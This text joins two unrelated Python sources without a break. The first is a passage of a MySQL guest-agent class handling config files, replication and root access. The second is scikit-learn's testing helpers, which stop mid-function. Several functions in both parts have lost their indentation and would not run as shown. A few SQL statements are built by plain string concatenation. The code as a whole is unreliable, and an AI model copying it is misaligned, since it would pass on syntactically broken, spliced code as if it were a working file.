        current size of the files MySQL will fail to start, so we delete the
        files to be safe.

        :raises exception.ProcessExecutionError: when a delete fails for a
            reason other than the file being absent.
        """
        LOG.info(_("Wiping ib_logfiles."))
        for index in range(2):
            try:
                # On restarts, sometimes these are wiped. So it can be a race
                # to have MySQL start up before it's restarted and these have
                # to be deleted. That's why its ok if they aren't found and
                # that is why we use the "-f" option to "rm".
                (utils.
                 execute_with_timeout("sudo", "rm", "-f", "%s/ib_logfile%d"
                                      % (MYSQL_BASE_DIR, index)))
            except exception.ProcessExecutionError:
                LOG.exception("Could not delete logfile.")
                raise
    def _write_mycnf(self, admin_password, config_contents, overrides=None):
        """
        Install the set of mysql my.cnf templates.
        Update the os_admin user and password to the my.cnf
        file for direct login from localhost.
        """
        LOG.info(_("Writing my.cnf templates."))
        if admin_password is None:
            # Preserve the existing credentials when none are supplied.
            admin_password = get_auth_password()
        try:
            # Stage the rendered config in /tmp, move it into place, then
            # rewrite it once more with the admin credentials appended
            # under the [client] section.
            with open(TMP_MYCNF, 'w') as t:
                t.write(config_contents)
            utils.execute_with_timeout("sudo", "mv", TMP_MYCNF,
                                       MYSQL_CONFIG)
            self._write_temp_mycnf_with_admin_account(MYSQL_CONFIG,
                                                      TMP_MYCNF,
                                                      admin_password)
            utils.execute_with_timeout("sudo", "mv", TMP_MYCNF,
                                       MYSQL_CONFIG)
        except Exception:
            # Don't leave a half-written temp config behind.
            os.unlink(TMP_MYCNF)
            raise
        self.wipe_ib_logfiles()
        # write configuration file overrides
        if overrides:
            self._write_config_overrides(overrides)
    def _write_config_overrides(self, overrideValues):
        """Stage overrides.cnf in /tmp, then install it world-readable."""
        LOG.info(_("Writing new temp overrides.cnf file."))
        with open(MYCNF_OVERRIDES_TMP, 'w') as overrides:
            overrides.write(overrideValues)
        LOG.info(_("Moving overrides.cnf into correct location."))
        utils.execute_with_timeout("sudo", "mv", MYCNF_OVERRIDES_TMP,
                                   MYCNF_OVERRIDES)
        LOG.info(_("Setting permissions on overrides.cnf."))
        # 0644 so the mysql user can read the file written via sudo.
        utils.execute_with_timeout("sudo", "chmod", "0644",
                                   MYCNF_OVERRIDES)
    def remove_overrides(self):
        """Delete overrides.cnf when present (no-op otherwise)."""
        LOG.info(_("Removing overrides configuration file."))
        if os.path.exists(MYCNF_OVERRIDES):
            utils.execute_with_timeout("sudo", "rm", MYCNF_OVERRIDES)
    def _write_replication_overrides(self, overrideValues, cnf_file):
        """Stage a replication config in /tmp, then install it at cnf_file."""
        LOG.info(_("Writing replication.cnf file."))
        with open(MYCNF_REPLCONFIG_TMP, 'w') as overrides:
            overrides.write(overrideValues)
        LOG.debug("Moving temp replication.cnf into correct location.")
        utils.execute_with_timeout("sudo", "mv", MYCNF_REPLCONFIG_TMP,
                                   cnf_file)
        LOG.debug("Setting permissions on replication.cnf.")
        # 0644 so the mysql user can read the file written via sudo.
        utils.execute_with_timeout("sudo", "chmod", "0644", cnf_file)
    def _remove_replication_overrides(self, cnf_file):
        """Delete the given replication config file when present."""
        LOG.info(_("Removing replication configuration file."))
        if os.path.exists(cnf_file):
            utils.execute_with_timeout("sudo", "rm", cnf_file)
    def exists_replication_source_overrides(self):
        """Return True when a master-side replication config is installed."""
        return os.path.exists(MYCNF_REPLMASTER)
    def write_replication_source_overrides(self, overrideValues):
        # Install the master-side replication config.
        self._write_replication_overrides(overrideValues, MYCNF_REPLMASTER)
    def write_replication_replica_overrides(self, overrideValues):
        # Install the slave-side replication config.
        self._write_replication_overrides(overrideValues, MYCNF_REPLSLAVE)
    def remove_replication_source_overrides(self):
        # Remove the master-side replication config.
        self._remove_replication_overrides(MYCNF_REPLMASTER)
    def remove_replication_replica_overrides(self):
        # Remove the slave-side replication config.
        self._remove_replication_overrides(MYCNF_REPLSLAVE)
    def grant_replication_privilege(self, replication_user):
        """Grant REPLICATION SLAVE to the given replication user.

        :param replication_user: dict with 'name' and 'password' keys.
        """
        LOG.info(_("Granting Replication Slave privilege."))
        LOG.debug("grant_replication_privilege: %s" % replication_user)
        with LocalSqlClient(get_engine()) as client:
            g = sql_query.Grant(permissions=['REPLICATION SLAVE'],
                                user=replication_user['name'],
                                clear=replication_user['password'])
            t = text(str(g))
            client.execute(t)
    def get_port(self):
        """Return the port the server is listening on (@@port)."""
        with LocalSqlClient(get_engine()) as client:
            result = client.execute('SELECT @@port').first()
            return result[0]
    def get_binlog_position(self):
        """Return the master's current binlog coordinates.

        :return: dict with 'log_file' and 'position' keys.
        """
        with LocalSqlClient(get_engine()) as client:
            result = client.execute('SHOW MASTER STATUS').first()
            binlog_position = {
                'log_file': result['File'],
                'position': result['Position']
            }
            return binlog_position
    def execute_on_client(self, sql_statement):
        """Execute an arbitrary statement inside one local transaction."""
        LOG.debug("Executing SQL: %s" % sql_statement)
        with LocalSqlClient(get_engine()) as client:
            return client.execute(sql_statement)
    def start_slave(self):
        """Start replication and wait up to 60s for it to report ON."""
        LOG.info(_("Starting slave replication."))
        with LocalSqlClient(get_engine()) as client:
            client.execute('START SLAVE')
            self._wait_for_slave_status("ON", client, 60)
    def stop_slave(self, for_failover):
        """Stop replication; drop the replication user unless failing over.

        :param for_failover: when True, keep the replication credentials
            so the instance can be re-attached as a master.
        :return: dict exposing the 'replication_user' that was in use.
        """
        replication_user = None
        LOG.info(_("Stopping slave replication."))
        with LocalSqlClient(get_engine()) as client:
            result = client.execute('SHOW SLAVE STATUS')
            replication_user = result.first()['Master_User']
            client.execute('STOP SLAVE')
            client.execute('RESET SLAVE ALL')
            self._wait_for_slave_status("OFF", client, 30)
            if not for_failover:
                # On a clean detach the credentials are no longer needed.
                client.execute('DROP USER ' + replication_user)
        return {
            'replication_user': replication_user
        }
    def stop_master(self):
        """Demote this master; RESET MASTER discards its binary logs."""
        LOG.info(_("Stopping replication master."))
        with LocalSqlClient(get_engine()) as client:
            client.execute('RESET MASTER')
    def _wait_for_slave_status(self, status, client, max_time):
        """Poll SHOW GLOBAL STATUS until slave_running matches status.

        :param status: expected value ('ON' or 'OFF'), case-insensitive.
        :param max_time: seconds to wait before giving up.
        :raises RuntimeError: when max_time elapses first.
        """
        def verify_slave_status():
            # [1] is the Value column of the status row.
            actual_status = client.execute(
                "SHOW GLOBAL STATUS like 'slave_running'").first()[1]
            return actual_status.upper() == status.upper()
        LOG.debug("Waiting for SLAVE_RUNNING to change to %s.", status)
        try:
            utils.poll_until(verify_slave_status, sleep_time=3,
                             time_out=max_time)
            LOG.info(_("Replication is now %s.") % status.lower())
        except PollTimeOut:
            raise RuntimeError(
                _("Replication is not %(status)s after %(max)d seconds.") % {
                    'status': status.lower(), 'max': max_time})
    def start_mysql(self, update_db=False):
        """Start the MySQL service and wait for it to report RUNNING.

        Enables start-on-boot first, then starts the service; a failed start
        command is tolerated (some variants report failure but come up), but
        if the status never reaches RUNNING the process is force-killed and
        RuntimeError is raised.

        :param update_db: forwarded to the status poller to persist state.
        """
        LOG.info(_("Starting MySQL."))
        # This is the site of all the trouble in the restart tests.
        # Essentially what happens is that mysql start fails, but does not
        # die. It is then impossible to kill the original, so
        self._enable_mysql_on_boot()
        try:
            mysql_service = operating_system.service_discovery(
                MYSQL_SERVICE_CANDIDATES)
            utils.execute_with_timeout(mysql_service['cmd_start'], shell=True)
        except KeyError:
            raise RuntimeError("Service is not discovered.")
        except exception.ProcessExecutionError:
            # it seems mysql (percona, at least) might come back with [Fail]
            # but actually come up ok. we're looking into the timing issue on
            # parallel, but for now, we'd like to give it one more chance to
            # come up. so regardless of the execute_with_timeout() response,
            # we'll assume mysql comes up and check its status for a while.
            pass
        if not self.status.wait_for_real_status_to_change_to(
                rd_instance.ServiceStatuses.RUNNING,
                self.state_change_wait_time, update_db):
            LOG.error(_("Start up of MySQL failed."))
            # If it won't start, but won't die either, kill it by hand so we
            # don't let a rogue process wander around.
            try:
                utils.execute_with_timeout("sudo", "pkill", "-9", "mysql")
            except exception.ProcessExecutionError:
                LOG.exception(_("Error killing stalled MySQL start command."))
            # There's nothing more we can do...
            self.status.end_install_or_restart()
            raise RuntimeError("Could not start MySQL!")
    def start_db_with_conf_changes(self, config_contents):
        """Write a new my.cnf and then start MySQL.

        :param config_contents: full contents for the new configuration file.
        :raises RuntimeError: if MySQL is already running.
        """
        LOG.info(_("Starting MySQL with conf changes."))
        LOG.debug("Inside the guest - Status is_running = (%s)."
                  % self.status.is_running)
        if self.status.is_running:
            LOG.error(_("Cannot execute start_db_with_conf_changes because "
                        "MySQL state == %s.") % self.status)
            raise RuntimeError("MySQL not stopped.")
        LOG.info(_("Resetting configuration."))
        self._write_mycnf(None, config_contents)
        self.start_mysql(True)
    def reset_configuration(self, configuration):
        """Overwrite my.cnf with configuration['config_contents'].

        Does not restart the server; the new settings take effect on the
        next start.
        """
        config_contents = configuration['config_contents']
        LOG.info(_("Resetting configuration."))
        self._write_mycnf(None, config_contents)
    # DEPRECATED: Maintain for API Compatibility
def get_txn_count(self):
LOG.info(_("Retrieving latest txn id."))
txn_count = 0
with LocalSqlClient(get_engine()) as client:
result = client.execute('SELECT @@global.gtid_executed').first()
for uuid_set in result[0].split(','):
for interval in uuid_set.split(':')[1:]:
if '-' in interval:
iparts = interval.split('-')
txn_count += int(iparts[1]) - int(iparts[0])
else:
txn_count += 1
return txn_count
    def _get_slave_status(self):
        """Return the first SHOW SLAVE STATUS row (None when not a slave)."""
        with LocalSqlClient(get_engine()) as client:
            return client.execute('SHOW SLAVE STATUS').first()
def _get_master_UUID(self):
slave_status = self._get_slave_status()
return slave_status and slave_status['Master_UUID'] or None
    def _get_gtid_executed(self):
        """Return the server's @@global.gtid_executed GTID-set string."""
        with LocalSqlClient(get_engine()) as client:
            return client.execute('SELECT @@global.gtid_executed').first()[0]
def get_last_txn(self):
master_UUID = self._get_master_UUID()
last_txn_id = '0'
gtid_executed = self._get_gtid_executed()
for gtid_set in gtid_executed.split(','):
uuid_set = gtid_set.split(':')
if uuid_set[0] == master_UUID:
last_txn_id = uuid_set[-1].split('-')[-1]
break
return master_UUID, int(last_txn_id)
    def get_latest_txn_id(self):
        """Return the full executed-GTID set, used as the latest txn id."""
        LOG.info(_("Retrieving latest txn id."))
        return self._get_gtid_executed()
    def wait_for_txn(self, txn):
        """Block until the slave SQL thread has applied GTID set *txn*.

        NOTE(review): *txn* is interpolated into the SQL unescaped; callers
        are trusted to pass a well-formed GTID set string.
        """
        LOG.info(_("Waiting on txn '%s'.") % txn)
        with LocalSqlClient(get_engine()) as client:
            client.execute("SELECT WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS('%s')"
                           % txn)
class MySqlRootAccess(object):
    """Helpers to query and grant remote 'root' access on the local server."""

    @classmethod
    def is_root_enabled(cls):
        """Return True if root access is enabled; False otherwise."""
        with LocalSqlClient(get_engine()) as client:
            t = text(sql_query.ROOT_ENABLED)
            result = client.execute(t)
            LOG.debug("Found %s with remote root access." % result.rowcount)
            return result.rowcount != 0

    @classmethod
    def enable_root(cls, root_password=None):
        """Enable the root user global access and/or
        reset the root password.

        :param root_password: password to set; a random one is generated
            when omitted.
        :returns: the serialized root user (including the password).
        """
        user = models.RootUser()
        user.name = "root"
        user.host = "%"
        user.password = root_password or utils.generate_random_password()
        # (fix) removed leftover debug print(client) calls that wrote the
        # client object to stdout on every invocation.
        with LocalSqlClient(get_engine()) as client:
            try:
                cu = sql_query.CreateUser(user.name, host=user.host)
                t = text(str(cu))
                client.execute(t, **cu.keyArgs)
            except exc.OperationalError as err:
                # Ignore, user is already created, just reset the password
                # TODO(rnirmal): More fine grained error checking later on
                LOG.debug(err)
        with LocalSqlClient(get_engine()) as client:
            uu = sql_query.UpdateUser(user.name, host=user.host,
                                      clear=user.password)
            t = text(str(uu))
            client.execute(t)
            LOG.debug("CONF.root_grant: %s CONF.root_grant_option: %s." %
                      (CONF.root_grant, CONF.root_grant_option))
            g = sql_query.Grant(permissions=CONF.root_grant,
                                user=user.name,
                                host=user.host,
                                grant_option=CONF.root_grant_option,
                                clear=user.password)
            t = text(str(g))
            client.execute(t)
            return user.serialize()
| |
"""Testing utilities."""
# Copyright (c) 2011, 2012
# Authors: Pietro Berkes,
# Andreas Muller
# Mathieu Blondel
# Olivier Grisel
# Arnaud Joly
# Denis Engemann
# Giorgio Patrini
# Thierry Guillemot
# License: BSD 3 clause
import os
import os.path as op
import inspect
import warnings
import sys
import functools
import tempfile
from subprocess import check_output, STDOUT, CalledProcessError
from subprocess import TimeoutExpired
import scipy as sp
from functools import wraps
from inspect import signature
import shutil
import atexit
import unittest
from unittest import TestCase
# WindowsError only exist on Windows
try:
WindowsError
except NameError:
WindowsError = None
from numpy.testing import assert_allclose
from numpy.testing import assert_almost_equal
from numpy.testing import assert_approx_equal
from numpy.testing import assert_array_equal
from numpy.testing import assert_array_almost_equal
from numpy.testing import assert_array_less
import numpy as np
import joblib
import sklearn
from sklearn.utils import IS_PYPY, _IS_32BIT
# Public API of this testing module.
__all__ = ["assert_raises",
           "assert_raises_regexp",
           "assert_array_equal",
           "assert_almost_equal",
           "assert_array_almost_equal", "assert_array_less",
           "assert_approx_equal", "assert_allclose",
           "assert_run_python_script", "SkipTest"]
# Borrow unittest's assertion methods from a throwaway TestCase instance so
# they can be used as plain module-level functions.
_dummy = TestCase('__init__')
assert_raises = _dummy.assertRaises
SkipTest = unittest.case.SkipTest
assert_dict_equal = _dummy.assertDictEqual
assert_raises_regex = _dummy.assertRaisesRegex
# assert_raises_regexp is deprecated in Python 3.4 in favor of
# assert_raises_regex but lets keep the backward compat in scikit-learn with
# the old name for now
assert_raises_regexp = assert_raises_regex
def assert_warns(warning_class, func, *args, **kw):
    """Test that a certain warning occurs.
    Parameters
    ----------
    warning_class : the warning class
        The class to test for, e.g. UserWarning.
    func : callable
        Callable object to trigger warnings.
    *args : the positional arguments to `func`.
    **kw : the keyword arguments to `func`
    Returns
    -------
    result : the return value of `func`
    """
    with warnings.catch_warnings(record=True) as caught:
        # Make sure every warning is emitted, not only the first occurrence.
        warnings.simplefilter("always")
        result = func(*args, **kw)
        if hasattr(np, 'FutureWarning'):
            # Drop numpy-internal deprecation noise (numpy >= 1.9).
            caught = [item for item in caught
                      if item.category is not np.VisibleDeprecationWarning]
        if len(caught) == 0:
            raise AssertionError("No warning raised when calling %s"
                                 % func.__name__)
        matched = any(item.category is warning_class for item in caught)
        if not matched:
            raise AssertionError("%s did not give warning: %s( is %s)"
                                 % (func.__name__, warning_class, caught))
    return result
def assert_warns_message(warning_class, message, func, *args, **kw):
    # very important to avoid uncontrolled state propagation
    """Test that a certain warning occurs and with a certain message.
    Parameters
    ----------
    warning_class : the warning class
        The class to test for, e.g. UserWarning.
    message : str | callable
        The message or a substring of the message to test for. If callable,
        it takes a string as the argument and will trigger an AssertionError
        if the callable returns `False`.
    func : callable
        Callable object to trigger warnings.
    *args : the positional arguments to `func`.
    **kw : the keyword arguments to `func`.
    Returns
    -------
    result : the return value of `func`
    """
    with warnings.catch_warnings(record=True) as caught:
        # Force every warning to be emitted.
        warnings.simplefilter("always")
        if hasattr(np, 'FutureWarning'):
            # Let's not catch the numpy internal DeprecationWarnings
            warnings.simplefilter('ignore', np.VisibleDeprecationWarning)
        result = func(*args, **kw)
        if not caught:
            raise AssertionError("No warning raised when calling %s"
                                 % func.__name__)
        hits = [issubclass(item.category, warning_class) for item in caught]
        if True not in hits:
            raise AssertionError("No warning raised for %s with class %s"
                                 % (func.__name__, warning_class))
        if callable(message):
            check_in_message = message
        else:
            def check_in_message(msg): return message in msg
        message_found = False
        # Check the message of every warning whose class matched.
        for idx, hit in enumerate(hits):
            if not hit:
                continue
            raw = caught[idx].message  # For Python 3 compatibility
            msg = str(raw.args[0] if hasattr(raw, 'args') else raw)
            if check_in_message(msg):
                message_found = True
                break
        if not message_found:
            raise AssertionError("Did not receive the message you expected "
                                 "('%s') for <%s>, got: '%s'"
                                 % (message, func.__name__, msg))
    return result
def assert_warns_div0(func, *args, **kw):
    """Assume that numpy's warning for divide by zero is raised
    Handles the case of platforms that do not support warning on divide by zero
    Parameters
    ----------
    func
    *args
    **kw
    """
    with np.errstate(divide='warn', invalid='warn'):
        try:
            # Probe whether this platform warns on divide-by-zero at all.
            assert_warns(RuntimeWarning, np.divide, 1, np.zeros(1))
        except AssertionError:
            # This platform does not report numpy divide by zeros
            return func(*args, **kw)
        else:
            return assert_warns_message(RuntimeWarning,
                                        'invalid value encountered',
                                        func, *args, **kw)
# To remove when we support numpy 1.7
def assert_no_warnings(func, *args, **kw):
    """Call *func* and fail if it emits any warning.
    Parameters
    ----------
    func
    *args
    **kw
    """
    # very important to avoid uncontrolled state propagation
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter('always')
        result = func(*args, **kw)
        if hasattr(np, 'FutureWarning'):
            # Filter out numpy-specific warnings in numpy >= 1.9
            caught = [item for item in caught
                      if item.category is not np.VisibleDeprecationWarning]
        if caught:
            raise AssertionError("Got warnings when calling %s: [%s]"
                                 % (func.__name__,
                                    ', '.join(str(w) for w in caught)))
    return result
def ignore_warnings(obj=None, category=Warning):
    """Context manager and decorator to ignore warnings.
    Note: Using this (in both variants) will clear all warnings
    from all python modules loaded. In case you need to test
    cross-module-warning-logging, this is not your tool of choice.
    Parameters
    ----------
    obj : callable or None
        callable where you want to ignore the warnings.
    category : warning class, defaults to Warning.
        The category to filter. If Warning, all categories will be muted.
    Examples
    --------
    >>> with ignore_warnings():
    ...     warnings.warn('buhuhuhu')
    >>> def nasty_warn():
    ...     warnings.warn('buhuhuhu')
    ...     print(42)
    >>> ignore_warnings(nasty_warn)()
    42
    """
    # Guard first: warning classes are themselves callable, so this check
    # must come before the callable() branch.
    if isinstance(obj, type) and issubclass(obj, Warning):
        # Avoid common pitfall of passing category as the first positional
        # argument which result in the test not being run
        warning_name = obj.__name__
        raise ValueError(
            "'obj' should be a callable where you want to ignore warnings. "
            "You passed a warning class instead: 'obj={warning_name}'. "
            "If you want to pass a warning class to ignore_warnings, "
            "you should use 'category={warning_name}'".format(
                warning_name=warning_name))
    silencer = _IgnoreWarnings(category=category)
    return silencer(obj) if callable(obj) else silencer
class _IgnoreWarnings:
"""Improved and simplified Python warnings context manager and decorator.
This class allows the user to ignore the warnings raised by a function.
Copied from Python 2.7.5 and modified as required.
Parameters
----------
category : tuple of warning class, default to Warning
The category to filter. By default, all the categories will be muted.
"""
def __init__(self, category):
self._record = True
self._module = sys.modules['warnings']
self._entered = False
self.log = []
self.category = category
def __call__(self, fn):
"""Decorator to catch and hide warnings without visual nesting."""
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore", self.category)
return fn(*args, **kwargs)
return wrapper
def __repr__(self):
args = []
if self._record:
args.append("record=True")
if self._module is not sys.modules['warnings']:
args.append("module=%r" % self._module)
name = type(self).__name__
return "%s(%s)" % (name, ", ".join(args))
def __enter__(self):
if self._entered:
raise RuntimeError("Cannot enter %r twice" % self)
self._entered = True
self._filters = self._module.filters
self._module.filters = self._filters[:]
self._showwarning = self._module.showwarning
warnings.simplefilter("ignore", self.category)
def __exit__(self, *exc_info):
if not self._entered:
raise RuntimeError("Cannot exit %r without entering first" % self)
self._module.filters = self._filters
self._module.showwarning = self._showwarning
self.log[:] = []
def assert_raise_message(exceptions, message, function, *args, **kwargs):
    """Helper function to test the message raised in an exception.
    Given an exception, a callable to raise the exception, and
    a message string, tests that the correct exception is raised and
    that the message is a substring of the error thrown. Used to test
    that the specific message thrown during an exception is correct.
    Parameters
    ----------
    exceptions : exception or tuple of exception
        An Exception object.
    message : str
        The error message or a substring of the error message.
    function : callable
        Callable object to raise error.
    *args : the positional arguments to `function`.
    **kwargs : the keyword arguments to `function`.
    """
    try:
        function(*args, **kwargs)
    except exceptions as e:
        observed = str(e)
        if message in observed:
            return
        raise AssertionError("Error message does not include the expected"
                             " string: %r. Observed error message: %r" %
                             (message, observed))
    # No expected exception was raised: report which type(s) were expected.
    if isinstance(exceptions, tuple):
        names = " or ".join(e.__name__ for e in exceptions)
    else:
        names = exceptions.__name__
    raise AssertionError("%s not raised by %s" %
                         (names, function.__name__))
def assert_allclose_dense_sparse(x, y, rtol=1e-07, atol=1e-9, err_msg=''):
    """Assert allclose for sparse and dense data.
    Both x and y need to be either sparse or dense, they
    can't be mixed.
    Parameters
    ----------
    x : array-like or sparse matrix
        First array to compare.
    y : array-like or sparse matrix
        Second array to compare.
    rtol : float, optional
        relative tolerance; see numpy.allclose
    atol : float, optional
        absolute tolerance; see numpy.allclose. Note that the default here is
        more tolerant than the default for numpy.testing.assert_allclose, where
        atol=0.
    err_msg : string, default=''
        Error message to raise.
    """
    x_is_sparse = sp.sparse.issparse(x)
    y_is_sparse = sp.sparse.issparse(y)
    if x_is_sparse and y_is_sparse:
        # Canonicalize to CSR with unique entries before structural compare.
        x = x.tocsr()
        y = y.tocsr()
        x.sum_duplicates()
        y.sum_duplicates()
        assert_array_equal(x.indices, y.indices, err_msg=err_msg)
        assert_array_equal(x.indptr, y.indptr, err_msg=err_msg)
        assert_allclose(x.data, y.data, rtol=rtol, atol=atol, err_msg=err_msg)
    elif not x_is_sparse and not y_is_sparse:
        # both dense
        assert_allclose(x, y, rtol=rtol, atol=atol, err_msg=err_msg)
    else:
        raise ValueError("Can only compare two sparse matrices,"
                         " not a sparse matrix and an array.")
def set_random_state(estimator, random_state=0):
    """Set random state of an estimator if it has the `random_state` param.
    Parameters
    ----------
    estimator : object
        The estimator
    random_state : int, RandomState instance or None, optional, default=0
        Pseudo random number generator state.
        Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
    """
    params = estimator.get_params()
    # Silently do nothing for estimators without a random_state parameter.
    if "random_state" in params:
        estimator.set_params(random_state=random_state)
# pytest-dependent test markers: defined only when pytest is importable so
# that importing this module never hard-requires pytest.
try:
    import pytest
    skip_if_32bit = pytest.mark.skipif(_IS_32BIT,
                                       reason='skipped on 32bit platforms')
    skip_travis = pytest.mark.skipif(os.environ.get('TRAVIS') == 'true',
                                     reason='skip on travis')
    fails_if_pypy = pytest.mark.xfail(IS_PYPY,
                                      reason='not compatible with PyPy')
    skip_if_no_parallel = pytest.mark.skipif(not joblib.parallel.mp,
                                             reason="joblib is in serial mode")
    # Decorator for tests involving both BLAS calls and multiprocessing.
    #
    # Under POSIX (e.g. Linux or OSX), using multiprocessing in conjunction
    # with some implementation of BLAS (or other libraries that manage an
    # internal posix thread pool) can cause a crash or a freeze of the Python
    # process.
    #
    # In practice all known packaged distributions (from Linux distros or
    # Anaconda) of BLAS under Linux seems to be safe. So this problem seems
    # to only impact OSX users.
    #
    # This wrapper makes it possible to skip tests that can possibly cause
    # this crash under OS X with.
    #
    # Under Python 3.4+ it is possible to use the `forkserver` start method
    # for multiprocessing to avoid this issue. However it can cause pickling
    # errors on interactively defined functions. It therefore not enabled by
    # default.
    if_safe_multiprocessing_with_blas = pytest.mark.skipif(
        sys.platform == 'darwin',
        reason="Possible multi-process bug with some BLAS")
except ImportError:
    pass
def check_skip_network():
    """Skip the calling test when SKLEARN_SKIP_NETWORK_TESTS is truthy."""
    flag = os.environ.get('SKLEARN_SKIP_NETWORK_TESTS', 0)
    if int(flag):
        raise SkipTest("Text tutorial requires large dataset download")
def _delete_folder(folder_path, warn=False):
"""Utility function to cleanup a temporary folder if still existing.
Copy from joblib.pool (for independence).
"""
try:
if os.path.exists(folder_path):
# This can fail under windows,
# but will succeed when called by atexit
shutil.rmtree(folder_path)
except WindowsError:
if warn:
warnings.warn("Could not delete temporary folder %s" % folder_path)
class TempMemmap:
    """Context manager exposing *data* as a memmap-backed read-only copy.
    Parameters
    ----------
    data
    mmap_mode
    """

    def __init__(self, data, mmap_mode='r'):
        self.mmap_mode = mmap_mode
        self.data = data

    def __enter__(self):
        backed, self.temp_folder = create_memmap_backed_data(
            self.data, mmap_mode=self.mmap_mode, return_folder=True)
        return backed

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Always remove the backing folder, even when the body raised.
        _delete_folder(self.temp_folder)
def create_memmap_backed_data(data, mmap_mode='r', return_folder=False):
    """Dump *data* into a temp folder and reload it memory-mapped.
    Parameters
    ----------
    data
    mmap_mode
    return_folder
    """
    temp_folder = tempfile.mkdtemp(prefix='sklearn_testing_')
    # Best-effort cleanup at interpreter exit; warns if it cannot delete.
    atexit.register(functools.partial(_delete_folder, temp_folder, warn=True))
    filename = op.join(temp_folder, 'data.pkl')
    joblib.dump(data, filename)
    memmap_backed_data = joblib.load(filename, mmap_mode=mmap_mode)
    if return_folder:
        return memmap_backed_data, temp_folder
    return memmap_backed_data
# Utils to test docstrings
def _get_args(function, varargs=False):
"""Helper to get function arguments"""
try:
params = signature(function).parameters
except ValueError:
# Error on builtin C function
return []
args = [key for key, param in params.items()
if param.kind not in (param.VAR_POSITIONAL, param.VAR_KEYWORD)]
if varargs:
varargs = [param.name for param in params.values()
if param.kind == param.VAR_POSITIONAL]
if len(varargs) == 0:
varargs = None
return args, varargs
else:
return args
def _get_func_name(func):
"""Get function full name
Parameters
----------
func : callable
The function object.
Returns
-------
name : str
The function name.
"""
parts = []
module = inspect.getmodule(func)
if module:
parts.append(module.__name__)
qualname = func.__qualname__
if qualname != func.__name__:
parts.append(qualname[:qualname.find('.')])
parts.append(func.__name__)
return '.'.join(parts)
def check_docstring_parameters(func, doc=None, ignore=None):
    """Helper to check docstring
    Parameters
    ----------
    func : callable
        The function object to test.
    doc : str, optional (default: None)
        Docstring if it is passed manually to the test.
    ignore : None | list
        Parameters to ignore.
    Returns
    -------
    incorrect : list
        A list of string describing the incorrect results.
    """
    from numpydoc import docscrape
    incorrect = []
    ignore = [] if ignore is None else ignore
    func_name = _get_func_name(func)
    # Only check first-party sklearn code (vendored externals excluded).
    if (not func_name.startswith('sklearn.') or
            func_name.startswith('sklearn.externals')):
        return incorrect
    # Don't check docstring for property-functions
    if inspect.isdatadescriptor(func):
        return incorrect
    # Don't check docstring for setup / teardown pytest functions
    if func_name.split('.')[-1] in ('setup_module', 'teardown_module'):
        return incorrect
    # Dont check estimator_checks module
    # NOTE(review): assumes func_name has at least 3 dotted parts; a
    # two-part name like 'sklearn.foo' would raise IndexError — confirm.
    if func_name.split('.')[2] == 'estimator_checks':
        return incorrect
    # Get the arguments from the function signature
    param_signature = list(filter(lambda x: x not in ignore, _get_args(func)))
    # drop self
    if len(param_signature) > 0 and param_signature[0] == 'self':
        param_signature.remove('self')
    # Analyze function's docstring
    if doc is None:
        with warnings.catch_warnings(record=True) as w:
            try:
                doc = docscrape.FunctionDoc(func)
            except Exception as exp:
                incorrect += [func_name + ' parsing error: ' + str(exp)]
                return incorrect
        if len(w):
            raise RuntimeError('Error for %s:\n%s' % (func_name, w[0]))
    param_docs = []
    for name, type_definition, param_doc in doc['Parameters']:
        # Type hints are empty only if parameter name ended with :
        if not type_definition.strip():
            if ':' in name and name[:name.index(':')][-1:].strip():
                incorrect += [func_name +
                              ' There was no space between the param name and '
                              'colon (%r)' % name]
            elif name.rstrip().endswith(':'):
                incorrect += [func_name +
                              ' Parameter %r has an empty type spec. '
                              'Remove the colon' % (name.lstrip())]
        # Create a list of parameters to compare with the parameters gotten
        # from the func signature
        if '*' not in name:
            param_docs.append(name.split(':')[0].strip('` '))
    # If one of the docstring's parameters had an error then return that
    # incorrect message
    if len(incorrect) > 0:
        return incorrect
    # Remove the parameters that should be ignored from list
    param_docs = list(filter(lambda x: x not in ignore, param_docs))
    # The following is derived from pytest, Copyright (c) 2004-2017 Holger
    # Krekel and others, Licensed under MIT License. See
    # https://github.com/pytest-dev/pytest
    message = []
    for i in range(min(len(param_docs), len(param_signature))):
        if param_signature[i] != param_docs[i]:
            message += ["There's a parameter name mismatch in function"
                        " docstring w.r.t. function signature, at index %s"
                        " diff: %r != %r" %
                        (i, param_signature[i], param_docs[i])]
            break
    if len(param_signature) > len(param_docs):
        message += ["Parameters in function docstring have less items w.r.t."
                    " function signature, first missing item: %s" %
                    param_signature[len(param_docs)]]
    elif len(param_signature) < len(param_docs):
        message += ["Parameters in function docstring have more items w.r.t."
                    " function signature, first extra item: %s" %
                    param_docs[len(param_signature)]]
    # If there wasn't any difference in the parameters themselves between
    # docstring and signature including having the same length then return
    # empty list
    if len(message) == 0:
        return []
    import difflib
    import pprint
    param_docs_formatted = pprint.pformat(param_docs).splitlines()
    param_signature_formatted = pprint.pformat(param_signature).splitlines()
    message += ["Full diff:"]
    message.extend(
        line.strip() for line in difflib.ndiff(param_signature_formatted,
                                               param_docs_formatted)
    )
    incorrect.extend(message)
    # Prepend function name
    incorrect = ['In function: ' + func_name] + incorrect
    return incorrect
def assert_run_python_script(source_code, timeout=60):
    """Utility to check assertions in an independent Python subprocess.
    The script provided in the source code should return 0 and not print
    anything on stderr or stdout.
    This is a port from cloudpickle https://github.com/cloudpipe/cloudpickle
    Parameters
    ----------
    source_code : str
        The Python source code to execute.
    timeout : int
        Time in seconds before timeout.
    """
    fd, source_file = tempfile.mkstemp(suffix='_src_test_sklearn.py')
    os.close(fd)
    try:
        with open(source_file, 'wb') as f:
            f.write(source_code.encode('utf-8'))
        cmd = [sys.executable, source_file]
        # Run from the checkout root so `import sklearn` resolves to this
        # working copy.
        cwd = op.normpath(op.join(op.dirname(sklearn.__file__), '..'))
        env = os.environ.copy()
        try:
            env["PYTHONPATH"] = os.pathsep.join([cwd, env["PYTHONPATH"]])
        except KeyError:
            env["PYTHONPATH"] = cwd
        kwargs = {
            'cwd': cwd,
            'stderr': STDOUT,
            'env': env
        }
        # If coverage is running, pass the config file to the subprocess
        coverage_rc = os.environ.get("COVERAGE_PROCESS_START")
        if coverage_rc:
            kwargs['env']['COVERAGE_PROCESS_START'] = coverage_rc
        kwargs['timeout'] = timeout
        try:
            try:
